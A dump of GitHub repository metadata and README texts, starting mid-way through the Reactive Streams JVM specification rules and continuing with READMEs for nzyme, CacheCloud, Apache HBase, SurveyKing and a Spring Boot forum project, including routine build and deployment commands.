| 10 | `Publisher.subscribe` MAY be called as many times as wanted but MUST be with a different `Subscriber` each time [see [2.12](#2.12)]. |
| [:bulb:](#1.10 ""1.10 explained"") | *The intent of this rule is to have callers of `subscribe` be aware that a generic Publisher and a generic Subscriber cannot be assumed to support being attached multiple times. Furthermore, it also mandates that the semantics of `subscribe` must be upheld no matter how many times it is called.* |
| 11 | A `Publisher` MAY support multiple `Subscriber`s and decides whether each `Subscription` is unicast or multicast. |
| [:bulb:](#1.11 ""1.11 explained"") | *The intent of this rule is to give Publisher implementations the flexibility to decide how many, if any, Subscribers they will support, and how elements are going to be distributed.* |
#### 2. Subscriber ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Subscriber.java))
```java
public interface Subscriber {
public void onSubscribe(Subscription s);
public void onNext(T t);
public void onError(Throwable t);
public void onComplete();
}
````
| ID | Rule |
| ------------------------- | ------------------------------------------------------------------------------------------------------ |
| 1 | A `Subscriber` MUST signal demand via `Subscription.request(long n)` to receive `onNext` signals. |
| [:bulb:](#2.1 ""2.1 explained"") | *The intent of this rule is to establish that it is the responsibility of the Subscriber to decide when and how many elements it is able and willing to receive. To avoid signal reordering caused by reentrant Subscription methods, it is strongly RECOMMENDED for synchronous Subscriber implementations to invoke Subscription methods at the very end of any signal processing. It is RECOMMENDED that Subscribers request the upper limit of what they are able to process, as requesting only one element at a time results in an inherently inefficient ""stop-and-wait"" protocol.* |
| 2 | If a `Subscriber` suspects that its processing of signals will negatively impact its `Publisher`´s responsivity, it is RECOMMENDED that it asynchronously dispatches its signals. |
| [:bulb:](#2.2 ""2.2 explained"") | *The intent of this rule is that a Subscriber should [not obstruct](#term_non-obstructing) the progress of the Publisher from an execution point-of-view. In other words, the Subscriber should not starve the Publisher from receiving CPU cycles.* |
| 3 | `Subscriber.onComplete()` and `Subscriber.onError(Throwable t)` MUST NOT call any methods on the `Subscription` or the `Publisher`. |
| [:bulb:](#2.3 ""2.3 explained"") | *The intent of this rule is to prevent cycles and race-conditions—between Publisher, Subscription and Subscriber—during the processing of completion signals.* |
| 4 | `Subscriber.onComplete()` and `Subscriber.onError(Throwable t)` MUST consider the Subscription cancelled after having received the signal. |
| [:bulb:](#2.4 ""2.4 explained"") | *The intent of this rule is to make sure that Subscribers respect a Publisher’s [terminal state](#term_terminal_state) signals. A Subscription is simply not valid anymore after an onComplete or onError signal has been received.* |
| 5 | A `Subscriber` MUST call `Subscription.cancel()` on the given `Subscription` after an `onSubscribe` signal if it already has an active `Subscription`. |
| [:bulb:](#2.5 ""2.5 explained"") | *The intent of this rule is to prevent that two, or more, separate Publishers from trying to interact with the same Subscriber. Enforcing this rule means that resource leaks are prevented since extra Subscriptions will be cancelled. Failure to conform to this rule may lead to violations of Publisher rule 1, amongst others. Such violations can lead to hard-to-diagnose bugs.* |
| 6 | A `Subscriber` MUST call `Subscription.cancel()` if the `Subscription` is no longer needed. |
| [:bulb:](#2.6 ""2.6 explained"") | *The intent of this rule is to establish that Subscribers cannot just throw Subscriptions away when they are no longer needed, they have to call `cancel` so that resources held by that Subscription can be safely, and timely, reclaimed. An example of this would be a Subscriber which is only interested in a specific element, which would then cancel its Subscription to signal its completion to the Publisher.* |
| 7 | A Subscriber MUST ensure that all calls on its Subscription's request and cancel methods are performed [serially](#term_serially). |
| [:bulb:](#2.7 ""2.7 explained"") | *The intent of this rule is to permit the calling of the request and cancel methods (including from multiple threads) if and only if a [serial](#term_serially) relation between each of the calls is established.* |
| 8 | A `Subscriber` MUST be prepared to receive one or more `onNext` signals after having called `Subscription.cancel()` if there are still requested elements pending [see [3.12](#3.12)]. `Subscription.cancel()` does not guarantee to perform the underlying cleaning operations immediately. |
| [:bulb:](#2.8 ""2.8 explained"") | *The intent of this rule is to highlight that there may be a delay between calling `cancel` and the Publisher observing that cancellation.* |
| 9 | A `Subscriber` MUST be prepared to receive an `onComplete` signal with or without a preceding `Subscription.request(long n)` call. |
| [:bulb:](#2.9 ""2.9 explained"") | *The intent of this rule is to establish that completion is unrelated to the demand flow—this allows for streams which complete early, and obviates the need to *poll* for completion.* |
| 10 | A `Subscriber` MUST be prepared to receive an `onError` signal with or without a preceding `Subscription.request(long n)` call. |
| [:bulb:](#2.10 ""2.10 explained"") | *The intent of this rule is to establish that Publisher failures may be completely unrelated to signalled demand. This means that Subscribers do not need to poll to find out if the Publisher will not be able to fulfill its requests.* |
| 11 | A `Subscriber` MUST make sure that all calls on its [signal](#term_signal) methods happen-before the processing of the respective signals. I.e. the Subscriber must take care of properly publishing the signal to its processing logic. |
| [:bulb:](#2.11 ""2.11 explained"") | *The intent of this rule is to establish that it is the responsibility of the Subscriber implementation to make sure that asynchronous processing of its signals are thread safe. See [JMM definition of Happens-Before in section 17.4.5](https://docs.oracle.com/javase/specs/jls/se8/html/jls-17.html#jls-17.4.5).* |
| 12 | `Subscriber.onSubscribe` MUST be called at most once for a given `Subscriber` (based on object equality). |
| [:bulb:](#2.12 ""2.12 explained"") | *The intent of this rule is to establish that it MUST be assumed that the same Subscriber can only be subscribed at most once. Note that `object equality` is `a.equals(b)`.* |
| 13 | Calling `onSubscribe`, `onNext`, `onError` or `onComplete` MUST [return normally](#term_return_normally) except when any provided parameter is `null` in which case it MUST throw a `java.lang.NullPointerException` to the caller, for all other situations the only legal way for a `Subscriber` to signal failure is by cancelling its `Subscription`. In the case that this rule is violated, any associated `Subscription` to the `Subscriber` MUST be considered as cancelled, and the caller MUST raise this error condition in a fashion that is adequate for the runtime environment. |
| [:bulb:](#2.13 ""2.13 explained"") | *The intent of this rule is to establish the semantics for the methods of Subscriber and what the Publisher is allowed to do in which case this rule is violated. «Raise this error condition in a fashion that is adequate for the runtime environment» could mean logging the error—or otherwise make someone or something aware of the situation—as the error cannot be signalled to the faulty Subscriber.* |
#### 3. Subscription ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Subscription.java))
```java
public interface Subscription {
public void request(long n);
public void cancel();
}
````
| ID | Rule |
| ------------------------- | ------------------------------------------------------------------------------------------------------ |
| 1 | `Subscription.request` and `Subscription.cancel` MUST only be called inside of its `Subscriber` context. |
| [:bulb:](#3.1 ""3.1 explained"") | *The intent of this rule is to establish that a Subscription represents the unique relationship between a Subscriber and a Publisher [see [2.12](#2.12)]. The Subscriber is in control over when elements are requested and when more elements are no longer needed.* |
| 2 | The `Subscription` MUST allow the `Subscriber` to call `Subscription.request` synchronously from within `onNext` or `onSubscribe`. |
| [:bulb:](#3.2 ""3.2 explained"") | *The intent of this rule is to make it clear that implementations of `request` must be reentrant, to avoid stack overflows in the case of mutual recursion between `request` and `onNext` (and eventually `onComplete` / `onError`). This implies that Publishers can be `synchronous`, i.e. signalling `onNext`´s on the thread which calls `request`.* |
| 3 | `Subscription.request` MUST place an upper bound on possible synchronous recursion between `Publisher` and `Subscriber`. |
| [:bulb:](#3.3 ""3.3 explained"") | *The intent of this rule is to complement [see [3.2](#3.2)] by placing an upper limit on the mutual recursion between `request` and `onNext` (and eventually `onComplete` / `onError`). Implementations are RECOMMENDED to limit this mutual recursion to a depth of `1` (ONE)—for the sake of conserving stack space. An example for undesirable synchronous, open recursion would be Subscriber.onNext -> Subscription.request -> Subscriber.onNext -> …, as it otherwise will result in blowing the calling thread´s stack.* |
| 4 | `Subscription.request` SHOULD respect the responsivity of its caller by returning in a timely manner. |
| [:bulb:](#3.4 ""3.4 explained"") | *The intent of this rule is to establish that `request` is intended to be a [non-obstructing](#term_non-obstructing) method, and should be as quick to execute as possible on the calling thread, so avoid heavy computations and other things that would stall the caller´s thread of execution.* |
| 5 | `Subscription.cancel` MUST respect the responsivity of its caller by returning in a timely manner, MUST be idempotent and MUST be [thread-safe](#term_thread-safe). |
| [:bulb:](#3.5 ""3.5 explained"") | *The intent of this rule is to establish that `cancel` is intended to be a [non-obstructing](#term_non-obstructing) method, and should be as quick to execute as possible on the calling thread, so avoid heavy computations and other things that would stall the caller´s thread of execution. Furthermore, it is also important that it is possible to call it multiple times without any adverse effects.* |
| 6 | After the `Subscription` is cancelled, additional `Subscription.request(long n)` MUST be [NOPs](#term_nop). |
| [:bulb:](#3.6 ""3.6 explained"") | *The intent of this rule is to establish a causal relationship between cancellation of a subscription and the subsequent non-operation of requesting more elements.* |
| 7 | After the `Subscription` is cancelled, additional `Subscription.cancel()` MUST be [NOPs](#term_nop). |
| [:bulb:](#3.7 ""3.7 explained"") | *The intent of this rule is superseded by [3.5](#3.5).* |
| 8 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MUST register the given number of additional elements to be produced to the respective subscriber. |
| [:bulb:](#3.8 ""3.8 explained"") | *The intent of this rule is to make sure that `request`-ing is an additive operation, as well as ensuring that a request for elements is delivered to the Publisher.* |
| 9 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MUST signal `onError` with a `java.lang.IllegalArgumentException` if the argument is <= 0. The cause message SHOULD explain that non-positive request signals are illegal. |
| [:bulb:](#3.9 ""3.9 explained"") | *The intent of this rule is to prevent faulty implementations to proceed operation without any exceptions being raised. Requesting a negative or 0 number of elements, since requests are additive, most likely to be the result of an erroneous calculation on the behalf of the Subscriber.* |
| 10 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MAY synchronously call `onNext` on this (or other) subscriber(s). |
| [:bulb:](#3.10 ""3.10 explained"") | *The intent of this rule is to establish that it is allowed to create synchronous Publishers, i.e. Publishers who execute their logic on the calling thread.* |
| 11 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MAY synchronously call `onComplete` or `onError` on this (or other) subscriber(s). |
| [:bulb:](#3.11 ""3.11 explained"") | *The intent of this rule is to establish that it is allowed to create synchronous Publishers, i.e. Publishers who execute their logic on the calling thread.* |
| 12 | While the `Subscription` is not cancelled, `Subscription.cancel()` MUST request the `Publisher` to eventually stop signaling its `Subscriber`. The operation is NOT REQUIRED to affect the `Subscription` immediately. |
| [:bulb:](#3.12 ""3.12 explained"") | *The intent of this rule is to establish that the desire to cancel a Subscription is eventually respected by the Publisher, acknowledging that it may take some time before the signal is received.* |
| 13 | While the `Subscription` is not cancelled, `Subscription.cancel()` MUST request the `Publisher` to eventually drop any references to the corresponding subscriber. |
| [:bulb:](#3.13 ""3.13 explained"") | *The intent of this rule is to make sure that Subscribers can be properly garbage-collected after their subscription no longer being valid. Re-subscribing with the same Subscriber object is discouraged [see [2.12](#2.12)], but this specification does not mandate that it is disallowed since that would mean having to store previously cancelled subscriptions indefinitely.* |
| 14 | While the `Subscription` is not cancelled, calling `Subscription.cancel` MAY cause the `Publisher`, if stateful, to transition into the `shut-down` state if no other `Subscription` exists at this point [see [1.9](#1.9)]. |
| [:bulb:](#3.14 ""3.14 explained"") | *The intent of this rule is to allow for Publishers to signal `onComplete` or `onError` following `onSubscribe` for new Subscribers in response to a cancellation signal from an existing Subscriber.* |
| 15 | Calling `Subscription.cancel` MUST [return normally](#term_return_normally). |
| [:bulb:](#3.15 ""3.15 explained"") | *The intent of this rule is to disallow implementations to throw exceptions in response to `cancel` being called.* |
| 16 | Calling `Subscription.request` MUST [return normally](#term_return_normally). |
| [:bulb:](#3.16 ""3.16 explained"") | *The intent of this rule is to disallow implementations to throw exceptions in response to `request` being called.* |
| 17 | A `Subscription` MUST support an unbounded number of calls to `request` and MUST support a demand up to 2^63-1 (`java.lang.Long.MAX_VALUE`). A demand equal or greater than 2^63-1 (`java.lang.Long.MAX_VALUE`) MAY be considered by the `Publisher` as “effectively unbounded”. |
| [:bulb:](#3.17 ""3.17 explained"") | *The intent of this rule is to establish that the Subscriber can request an unbounded number of elements, in any increment above 0 [see [3.9](#3.9)], in any number of invocations of `request`. As it is not feasibly reachable with current or foreseen hardware within a reasonable amount of time (1 element per nanosecond would take 292 years) to fulfill a demand of 2^63-1, it is allowed for a Publisher to stop tracking demand beyond this point.* |
A `Subscription` is shared by exactly one `Publisher` and one `Subscriber` for the purpose of mediating the data exchange between this pair. This is the reason why the `subscribe()` method does not return the created `Subscription`, but instead returns `void`; the `Subscription` is only passed to the `Subscriber` via the `onSubscribe` callback.
#### 4.Processor ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Processor.java))
```java
public interface Processor extends Subscriber, Publisher {
}
````
| ID | Rule |
| ------------------------ | ------------------------------------------------------------------------------------------------------ |
| 1 | A `Processor` represents a processing stage—which is both a `Subscriber` and a `Publisher` and MUST obey the contracts of both. |
| [:bulb:](#4.1 ""4.1 explained"") | *The intent of this rule is to establish that Processors behave, and are bound by, both the Publisher and Subscriber specifications.* |
| 2 | A `Processor` MAY choose to recover an `onError` signal. If it chooses to do so, it MUST consider the `Subscription` cancelled, otherwise it MUST propagate the `onError` signal to its Subscribers immediately. |
| [:bulb:](#4.2 ""4.2 explained"") | *The intent of this rule is to inform that it’s possible for implementations to be more than simple transformations.* |
While not mandated, it can be a good idea to cancel a `Processor`´s upstream `Subscription` when/if its last `Subscriber` cancels their `Subscription`,
to let the cancellation signal propagate upstream.
### Asynchronous vs Synchronous Processing ###
The Reactive Streams API prescribes that all processing of elements (`onNext`) or termination signals (`onError`, `onComplete`) MUST NOT *block* the `Publisher`. However, each of the `on*` handlers can process the events synchronously or asynchronously.
Take this example:
```
nioSelectorThreadOrigin map(f) filter(p) consumeTo(toNioSelectorOutput)
```
It has an async origin and an async destination. Let’s assume that both origin and destination are selector event loops. The `Subscription.request(n)` must be chained from the destination to the origin. This is now where each implementation can choose how to do this.
The following uses the pipe `|` character to signal async boundaries (queue and schedule) and `R#` to represent resources (possibly threads).
```
nioSelectorThreadOrigin | map(f) | filter(p) | consumeTo(toNioSelectorOutput)
-------------- R1 ---- | - R2 - | -- R3 --- | ---------- R4 ----------------
```
In this example each of the 3 consumers, `map`, `filter` and `consumeTo` asynchronously schedule the work. It could be on the same event loop (trampoline), separate threads, whatever.
```
nioSelectorThreadOrigin map(f) filter(p) | consumeTo(toNioSelectorOutput)
------------------- R1 ----------------- | ---------- R2 ----------------
```
Here it is only the final step that asynchronously schedules, by adding work to the NioSelectorOutput event loop. The `map` and `filter` steps are synchronously performed on the origin thread.
Or another implementation could fuse the operations to the final consumer:
```
nioSelectorThreadOrigin | map(f) filter(p) consumeTo(toNioSelectorOutput)
--------- R1 ---------- | ------------------ R2 -------------------------
```
All of these variants are ""asynchronous streams"". They all have their place and each has different tradeoffs including performance and implementation complexity.
The Reactive Streams contract allows implementations the flexibility to manage resources and scheduling and mix asynchronous and synchronous processing within the bounds of a non-blocking, asynchronous, dynamic push-pull stream.
In order to allow fully asynchronous implementations of all participating API elements—`Publisher`/`Subscription`/`Subscriber`/`Processor`—all methods defined by these interfaces return `void`.
### Subscriber controlled queue bounds ###
One of the underlying design principles is that all buffer sizes are to be bounded and these bounds must be *known* and *controlled* by the subscribers. These bounds are expressed in terms of *element count* (which in turn translates to the invocation count of onNext). Any implementation that aims to support infinite streams (especially high output rate streams) needs to enforce bounds all along the way to avoid out-of-memory errors and constrain resource usage in general.
Since back-pressure is mandatory the use of unbounded buffers can be avoided. In general, the only time when a queue might grow without bounds is when the publisher side maintains a higher rate than the subscriber for an extended period of time, but this scenario is handled by backpressure instead.
Queue bounds can be controlled by a subscriber signaling demand for the appropriate number of elements. At any point in time the subscriber knows:
- the total number of elements requested: `P`
- the number of elements that have been processed: `N`
Then the maximum number of elements that may arrive—until more demand is signaled to the Publisher—is `P - N`. In the case that the subscriber also knows the number of elements B in its input buffer then this bound can be refined to `P - B - N`.
These bounds must be respected by a publisher independent of whether the source it represents can be backpressured or not. In the case of sources whose production rate cannot be influenced—for example clock ticks or mouse movement—the publisher must choose to either buffer or drop elements to obey the imposed bounds.
Subscribers signaling a demand for one element after the reception of an element effectively implement a Stop-and-Wait protocol where the demand signal is equivalent to acknowledgement. By providing demand for multiple elements the cost of acknowledgement is amortized. It is worth noting that the subscriber is allowed to signal demand at any point in time, allowing it to avoid unnecessary delays between the publisher and the subscriber (i.e. keeping its input buffer filled without having to wait for full round-trips).
## Legal
This project is a collaboration between engineers from Kaazing, Lightbend, Netflix, Pivotal, Red Hat, Twitter and many others. This project is licensed under MIT No Attribution (SPDX: MIT-0).
"
nzymedefense/nzyme,master,1322,146,2016-11-11T22:06:03Z,64941,105,Network Defense System.,detection ethernet ids ndr network response security visibility wifi wireless,"# nzyme - Network Defense System
[![Codecov](https://img.shields.io/codecov/c/github/lennartkoopmann/nzyme.svg)](https://codecov.io/gh/lennartkoopmann/nzyme/)
[![License](https://img.shields.io/badge/license-SSPL-brightgreen)](http://www.mongodb.com/licensing/server-side-public-license)
Learn more at https://www.nzyme.org/.
**Version 2.0.0 of nzyme is currently in development. The previous website for v1.x is archived [here](https://v1.nzyme.org/).**
## Contributing
There are many ways to contribute and all community interaction is absolutely welcome:
* Open an issue for any kind of bug you think you have found.
* Open an issue for anything that was confusing to you. Bad, missing or confusing documentation is considered a bug.
* Open a Pull Request for a new feature or a bugfix. It is a good idea to get in contact first to make sure that it fits the roadmap and has a chance to be merged.
* Write documentation.
* Write a blog post.
* Help a user in the issue tracker or the IRC channel (#nzyme on FreeNode.)
* Get in contact and say how you use it or what would be a cool addition.
* Tell the world.
Please be aware of the [Code of Conduct](CODE_OF_CONDUCT.md) that will be enforced across all channels and platforms.
## Legal notice
Make sure to comply with local laws, especially with regards to wiretapping, when running nzyme. Note that nzyme is never decrypting any data but only reading unencrypted data.
"
sohutv/cachecloud,main,8453,2037,2016-01-26T05:46:01Z,52949,35,"搜狐视频(sohu tv)Redis私有云平台 :支持Redis多种架构(Standalone、Sentinel、Cluster)高效管理、有效降低大规模redis运维成本,提升资源管控能力和利用率。平台提供快速搭建/迁移,运维管理,弹性伸缩,统计监控,客户端整合接入等功能。(CacheCloud is a Redis cloud management platform. It supports Standalone, Sentinel, and Cluster architectures for Redis, effectively reducing large-scale Redis operation and maintenance costs, and improving resource management and utilization. The platform provides rapid construction/migration, operation and maintenance management, elastic scaling, statistical monitoring, client integration and access and other functions)",cachecloud java jedis lettuce redis redis-cache redis-client redis-cluster redis-monitor redis-sentinel,"[中文](README_CN.md) | [EN](README_EN.md)
![cachecloud云平台](cachecloud-web/src/main/resources/static/img/readme/cachecloud-head.png)
[![CI checks on main badge]][CI checks on main link] [![latest release badge]][latest release link] [![github stars badge]][github stars link] [![github forks badge]][github forks link] [![github open issues badge]][github open issues link] [![github open prs badge]][github open prs link] [![latest commit to main badge]][latest commit to main link]
[CI checks on main badge]: https://flat.badgen.net/github/checks/sohutv/cachecloud/main?label=CI%20status%20on%20main&cache=900&icon=github
[CI checks on main link]:https://github.com/sohutv/cachecloud/actions?query=branch%3Amain
[github forks badge]: https://flat.badgen.net/github/forks/sohutv/cachecloud?icon=github
[github forks link]: https://useful-forks.github.io/?repo=sohutv%2Fcachecloud
[github open issues badge]: https://flat.badgen.net/github/open-issues/sohutv/cachecloud?icon=github
[github open issues link]: https://github.com/sohutv/cachecloud/issues?q=is%3Aissue+is%3Aopen
[github open prs badge]: https://flat.badgen.net/github/open-prs/sohutv/cachecloud?icon=github
[github open prs link]: https://github.com/sohutv/cachecloud/pulls?q=is%3Apr+is%3Aopen
[github stars badge]: https://flat.badgen.net/github/stars/sohutv/cachecloud?icon=github
[github stars link]: https://github.com/sohutv/cachecloud/stargazers
[latest commit to main badge]: https://flat.badgen.net/github/last-commit/sohutv/cachecloud/main?icon=github&color=yellow&label=last%20dev%20commit&cache=900
[latest commit to main link]: https://github.com/sohutv/cachecloud/commits/main
[latest release badge]: https://flat.badgen.net/github/release/sohutv/cachecloud/development?icon=github
[latest release link]: https://github.com/sohutv/cachecloud/releases
## CacheCloud是什么?
CacheCloud是一个Redis云管理平台:支持Redis多种架构(Standalone、Sentinel、Cluster)高效管理、有效降低大规模redis运维成本,提升资源管控能力和利用率。平台提供快速搭建/迁移,运维管理,弹性伸缩,统计监控,客户端整合接入等功能。
## CacheCloud功能架构
+ Redis搭建:宿主环境初始化、实例部署安装、类型架构支持;
+ 运维管理:宿主环境、资源管理、应用审计、应用运维、质量监控、诊断分析;
+ 统计监控:日志采集、实例采集、机器采集、应用统计、监控告警、问题诊断;
+ 客户端接入:SDK接入、语言接入、客户端监控;
+ 弹性伸缩:资源收缩、应用伸缩、外部接入;
## CacheCloud使用规模
+ 800亿+ commands/day
+ 18T+ Memory Total
+ 420+ app Total / 4800+ Instances Total
+ 80+ Physical machine/ 360+ K8s Pod Total
## CacheCloud VS 云厂商
Redis 主从/集群部署成本
## 贡献成员
## 感谢支持者
![Stargazers repo roster for @sohutv/cachecloud](https://bytecrank.com/nastyox/reporoster/php/stargazersSVG.php?user=sohutv&repo=cachecloud)
![Forkers repo roster for @sohutv/cachecloud](https://bytecrank.com/nastyox/reporoster/php/forkersSVG.php?user=sohutv&repo=cachecloud)
## 联系我们
+ QQ群: 534429768(已满) / 2群:894022242 / 3群:908821300
+ 微信群:
+ 微信:如果大家有公网资源可以联系我,会加入到开源版本服务资源部署试用,提高大家的用户体验。
如果你觉得CacheCloud对你有帮助,欢迎Star⭐。
"
apache/hbase,master,5114,3290,2014-05-23T07:00:07Z,482524,230,Apache HBase,database hbase java,"
![hbase-logo](https://raw.githubusercontent.com/apache/hbase/master/src/site/resources/images/hbase_logo_with_orca_large.png)
[Apache HBase](https://hbase.apache.org) is an open-source, distributed, versioned, column-oriented store modeled after Google' [Bigtable](https://research.google.com/archive/bigtable.html): A Distributed Storage System for Structured Data by Chang et al. Just as Bigtable leverages the distributed data storage provided by the Google File System, HBase provides Bigtable-like capabilities on top of [Apache Hadoop](https://hadoop.apache.org/).
# Getting Start
To get started using HBase, the full documentation for this release can be found under the doc/ directory that accompanies this README. Using a browser, open the docs/index.html to view the project home page (or browse https://hbase.apache.org). The hbase '[book](https://hbase.apache.org/book.html)' has a 'quick start' section and is where you should being your exploration of the hbase project.
The latest HBase can be downloaded from the [download page](https://hbase.apache.org/downloads.html).
We use mailing lists to send notice and discuss. The mailing lists and archives are listed [here](http://hbase.apache.org/mail-lists.html)
# How to Contribute
The source code can be found at https://hbase.apache.org/source-repository.html
The HBase issue tracker is at https://hbase.apache.org/issue-tracking.html
Notice that, the public registration for https://issues.apache.org/ has been disabled due to spam. If you want to contribute to HBase, please visit the [Request a jira account](https://selfserve.apache.org/jira-account.html) page to submit your request. Please make sure to select **hbase** as the '_ASF project you want to file a ticket_' so we can receive your request and process it.
> **_NOTE:_** we need to process the requests manually so it may take sometime, for example, up to a week, for us to respond to your request.
# About
Apache HBase is made available under the [Apache License, version 2.0](https://hbase.apache.org/license.html)
The HBase distribution includes cryptographic software. See the export control notice [here](https://hbase.apache.org/export_control.html).
"
javahuang/SurveyKing,master,2797,434,2021-09-06T13:34:14Z,76009,33,Make a better survey system.,java react-survey springboot survey surveyjs surveymonkey,"# 卷王
简体中文 | [English](./README.en-us.md)
## 功能最强大的调查问卷系统和考试系统
[点击](https://wj.surveyking.cn/s/start)卷王问卷考试系统-快速开始
需要您的 star ⭐️⭐️⭐️ 支持鼓励 🙏🙏🙏,**右上角点 Star (非强制)加QQ群(1074277968)获取最新的数据库脚本**。
## 快速开始(一键部署)
### 🚀 1 分钟快速体验调查问卷系统(无需安装数据库)
1. 下载卷王快速体验安装包(加群)
2. 解压,双击运行 start.bat
3. 打开浏览器访问 [http://localhost:1991](http://localhost:1991),输入账号密码: *admin*/*123456*
### 一键 docker 部署
```bash
docker run -p 1991:1991 surveyking/surveyking
```
## 特性
- 🥇 支持 20 多种题型,如填空、选择、下拉、级联、矩阵、分页、签名、题组、上传、[横向填空](https://wj.surveyking.cn/s/EMqvs7)等
- 🎉 多种创建问卷方式,Excel导入问卷、文本导入问卷、在线编辑器编辑问卷
- 💪 多种问卷设置,支持白名单答卷、公开查询、答卷限制等
- 🎇 数据,支持问卷数据新增、编辑、标记、导出、打印、预览和打包下载附件
- 🎨 报表,支持对问题实时统计分析并以图形(条形图、柱形图、扇形图)、表格的形式展示输出和导出
- 🚀 安装部署简单(**最快 1 分钟部署**),支持一键windows部署、一键docker部署、前后端分离部署、单jar部署、二级目录部署
- 🥊 响应式布局,所有页面完美适配电脑端和移动端(包含问卷编辑、设置、答卷)
- 👬 支持多人协作管理问卷
- 🎁 后端支持多种数据库,可支持所有带有 jdbc 驱动的关系型数据库
- 🐯 安全、可靠、稳定、高性能的后端 API 服务
- 🙆 支持完善的 RBAC 权限控制
- 🦋 支持可视化配置问卷跳转和显示逻辑,以及通过公式实现自定义逻辑(卷王的逻辑设置比目前主流商业调查问卷系统强大的多)
- **显示隐藏逻辑**
- **值计算逻辑** 动态计算问题答案,从最简单的根据身高体重计算BMI,到复杂的根据多个问题答案组合逻辑和数值实现复杂的运算
- **文本替换逻辑** 动态显示题目内容
- **值校验逻辑** 可以根据其他问题答案来判断当前问题是否有效
- **必填逻辑** 动态判断当前问题是否必填
- **选项自动勾选逻辑** 根据其他问题和选项答案自动勾选
- **选项显示隐藏逻辑** 动态的显示或者隐藏选项
- **结束问卷逻辑**
- **跳转逻辑** 动态跳转
- **结束问卷自定义提示语逻辑** 答卷后,可以根据问卷答案或者考试分数来显示不同的提示语信息
- **自定义跳转链接逻辑** 答卷后,可以根据问卷答案或者考试分数来跳转到不同的链接,且支持携带答案参数
- 🌈 支持选项唯一设置,多问卷数据关联查询、更新和删除,考试自动算分,自定义提示语,自定义跳转链接等等
## 问卷产品对比
| | 问卷网 | 腾讯问卷 | 问卷星 | 金数据 | 卷王 |
| --------------- | ------ | -------- | ------ | ------ | ---- |
| 问卷调查 | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ |
| 在线考试 | ✔️ | ❌ | ✔️ | ✔️ | ✔️ |
| 投票 | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ |
| 支持题型 | 🥇 | 🥉 | 🥇 | 🥈 | 🥈 |
| 题型设置 | 🥇 | 🥉 | 🥇 | 🥇 | 🥇 |
| 自动计算 | ❌ | ❌ | 🥉 | 🥈 | 🥇 |
| 逻辑设置 | 🥈 | 🥈 | 🥈 | 🥈 | 🥇 |
| 自定义校验 | ❌ | ❌ | ❌ | ❌ | ✔️ |
| 自定义导出 | 🥈 | ❌ | ❌ | 🥉 | 🥇 |
| 手机端编辑 | ✔️ | ✔️ | ✔️ | ✔️ | ✔️ |
| 公开查询(快查) | ✔️ | ❌ | ✔️ | ❌ | ✔️ |
| 私有部署 | 💰💰💰 | 💰💰💰 | 💰💰💰 | 💰💰💰 | 🆓 |
注: 上表与卷王对比的全部是商业问卷产品,他们有很多地方值得卷王学习,仅列出部分主要功能供大家参考,如果对结果有疑问,可以点击对应产品的链接自行对比体验。
🥇强 🥈中 🥉弱
## 友情推荐
[专注于中台化架构的低代码生成工具](https://gitee.com/orangeform/orange-admin)
## 预览截图
* 考试系统预览
* 调查问卷预览
"
kermitt2/grobid,master,3040,421,2012-09-13T15:48:54Z,1460367,398,A machine learning software for extracting information from scholarly documents,bibliographical-references crf deep-learning fulltext hamburger-to-cow machine-learning metadata pdf rnn scientific-articles transformers,
codedrinker/community,master,2609,767,2019-04-23T15:11:24Z,4671,21,开源论坛、问答系统,现有功能提问、回复、通知、最新、最热、消除零回复功能。功能持续更新中…… 技术栈 Spring、Spring Boot、MyBatis、MySQL/H2、Bootstrap,bootstrap flyway h2-database mybatis mybatis-generator mysql spring springboot,"## 码问
## 在线演示地址
[https://www.mawen.co](https://www.mawen.co),任何配置、使用和答疑问题,可以 👉[点击](#联系我) 联系我,也可以拉你进群沟通。
## 功能列表
开源论坛、问答系统,现有功能多社交平台登录(Github,Gitee)提问、回复、通知、最新问答、最热热大、消除零回复等功能。
## 当前项目配套的手把手视频教程
| 标题 | 链接 |
| --- | --- |
| 【Spring Boot 实战】论坛项目【第一季】 | [BV1r4411r7au](https://www.bilibili.com/video/BV1r4411r7au) |
| 【Spring Boot 实战】热门话题,经典面试问题实战,TopN 问题【第二季】| [BV1Z4411f7RK](https://www.bilibili.com/video/BV1Z4411f7RK) |
| 【Spring Boot 实战】接入广告流量变现(让你的网站益起来)【第三季】 | [BV1L4411y7J9](https://www.bilibili.com/video/BV1L4411y7J9) |
| 【Spring Boot 实战】Vue 零基础入门(前后端分离的前置视频)【第四季】 | [BV1gE411R7YA](https://www.bilibili.com/video/BV1gE411R7YA) |
| 【Spring Boot 实战】Java 设计模式实战(加薪的必修课)【第五季】 | [BV1UK4y1M7PC](https://www.bilibili.com/video/BV1UK4y1M7PC) |
| 【Spring Boot 实战】快速搭建免费 HTTPS 服务 | [BV1oJ411K7VT](https://www.bilibili.com/video/BV1oJ411K7VT) |
## 本地运行手册
1. 安装必备工具
JDK,Maven
2. 克隆代码到本地
```sh
git clone https://github.com/codedrinker/community.git
````
3. 运行数据库脚本,创建本地数据库
```sh
mvn flyway:migrate
```
如果需要使用 MySQL 数据库,运行脚本前修改两处配置
```
# src/main/resources/application.properties
spring.datasource.url=jdbc:h2:~/community
spring.datasource.username=sa
spring.datasource.password=123
```
```
# pom.xml
jdbc:h2:~/communitysa123
```
4. 运行打包命令,生成可执行 jar 文件
```sh
mvn package -DskipTests
```
4. 运行项目
```sh
java -jar target/community-0.0.1-SNAPSHOT.jar
```
如果是线上部署,可以增加配置文件(production.properties),同时运行命令修改如下
```sh
java -jar -Dspring.profiles.active=production target/community-0.0.1-SNAPSHOT.jar
```
5. 访问项目
```
http://localhost:8887
```
## 其他
1. 视频初期未使用 Flyway 之前的数据库脚本
```sql
CREATE TABLE USER
(
ID int AUTO_INCREMENT PRIMARY KEY NOT NULL,
ACCOUNT_ID VARCHAR(100),
NAME VARCHAR(50),
TOKEN VARCHAR(36),
GMT_CREATE BIGINT,
GMT_MODIFIED BIGINT
);
```
